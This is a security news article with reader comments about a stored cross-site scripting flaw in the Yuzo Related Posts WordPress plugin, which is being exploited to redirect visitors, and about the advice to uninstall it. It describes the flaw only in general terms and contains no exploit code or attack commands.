Users Urged to Uninstall WordPress Yuzo Plugin After Flaw Exploited

wordpress plugin zero day

A vulnerability in the Yuzo Related Posts WordPress plugin, used by 60,000 websites, is being exploited in the wild.

UPDATE

Users of the popular Yuzo Related Posts plugin are being urged to uninstall the plugin after a flaw was discovered being exploited in the wild – putting tens of thousands of websites at risk.

Yuzo Related Posts, which enables WordPress websites to display “related posts” segments, is installed on over 60,000 websites. A cross-site scripting flaw was recently disclosed in the plugin that could be used to deface websites, redirect visitors to unsafe websites, or compromise WordPress administrator accounts, and more.

That vulnerability is now being exploited in the wild, warned Dan Moen with Wordfence in a Wednesday post: “The vulnerability, which allows stored cross-site scripting (XSS), is now being exploited in the wild. These attacks appear to be linked to the same threat actor who targeted the recent Social Warfare and Easy WP SMTP vulnerabilities.”

The plugin was removed from the WordPress plugin directory on March 30 after a security researcher publicly and “irresponsibly” disclosed an unpatched vulnerability in the plugin that day, researchers with Wordfence said.

The support team for Yuzo Related Posts told Threatpost that it recommends users un-install the plugin immediately until an update becomes available.  

Automattic, which owns WordPress, did not immediately respond to a request for comment from Threatpost.

Moen said that the flaw stems from missing authentication checks in the plugin. Specifically, the flaw exists in the part of the plugin in charge of storing settings in the database.

That stored cross-site scripting flaw means that an unauthenticated attacker could inject malicious content into the plugin settings. If a bad actor were to inject a JavaScript payload into the settings, the payload would then be inserted into HTML templates – and executed by the web browser when users visit the compromised website, researchers said.

As of Wednesday (11 days after the irresponsible disclosure), researchers discovered that the flaw was being exploited, and websites with the plugin installed were being attacked.

Several companies using the plugin in their WordPress website, such as ManaJournal, said that as a consequence of the exploit their users were being re-directed to malicious websites.

Other plugin users took to WordPress.org, an open source project that is separate from WordPress.com, to share their own experiences with the plugin.

One user, who said her website was “sort of hacked because of this plugin,” said: “I regret that the developers did not even take the effort to inform the users about this (with an update stating: no longer safe, or something).”

Researchers linked this most recent attack to a separate WordPress plugin exploit in March: The plugin, Social Warfare was also plagued by a stored cross-site scripting vulnerability that was being exploited in the wild. The incident comes after a separate vulnerability was disclosed and patched in a different WordPress plugin, Easy WP SMTP.  This vulnerability was also under active attack and being exploited by malicious actors to establish administrative control of impacted sites, researchers said.

Third-party plugins continues to be an Achille’s Heel for WordPress security. In fact, according to a January Imperva report, almost all (98 percent) of WordPress vulnerabilities are related to plugins that extend the functionality and features of a website or a blog.

“Vulnerabilities in WordPress plugins has been a long standing problem,” Chris Orr, systems engineer at Tripwire, said in an email. “The plug-in directory is very much like the Google Play store where vetting of apps is a major weakness. Lack of notifications by the plug-in developer is also an issue to contend with. It is recommended that WordPress users either automatically update the platform and their apps or pay close attention to the ones they use and how they behave and keep an eye out for vulnerabilities.”

Don’t miss our free Threatpost webinar, “Data Security in the Cloud,” on April 24 at 2 p.m. ET.

A panel of experts will join Threatpost senior editor Tara Seals to discuss how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS.

This article was updated on April 12 at 1:46 p.m. to clarify that WordPress.org, erroneously described in a previous version of the article as a “support site” for WordPress.com, is an open source project that is separate from WordPress.com. 

Suggested articles

Discussion

  • Andrew on

    I got comments that my site was redirecting to spam yesterday and went crazy trying to figure out what was going on. Security scans didn't find anything. I ended up paying way too much for one of the premium cleanup services and after that was done, the site was still redirecting! After I Googled the url it was redirecting to I found a couple of articles and eventually this one. Deleted the Yuzo plugin immediately. So now I'm happy my site is healthy, but upset I wasted money on a service that didn't do anything!
  • Plugin Vulnerabilities on

    We are the service provider mentioned in your post, though incorrectly referred to as a "security researcher", our name is Plugin Vulnerabilities. We monitor the closure of popular WordPress plugins as that can indicate there is a security vulnerability in them that caused the removal and then if we find any, we warn our customers since that is what they pay us to do, as well as the public at large. By comparison the company you are mentioning only warns people after the vulnerabilities have been widely exploited, which obviously doesn't do people much good. Maybe it would be better to cite the original source, instead of a company that looks to be interested in leaving people vulnerable to being hacked instead of letting people take action before they can be exploited. We only came across the plugin because it was closed, so nothing we did could have caused it be closed, for some reason your source is claiming otherwise.
  • Ahmed on

    [A question for Wordfence:] Can you please share your PoC paper where you highlighted the vulnerabilities or its for your paid members only?

Leave A Reply to Plugin Vulnerabilities Cancel Reply

 

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.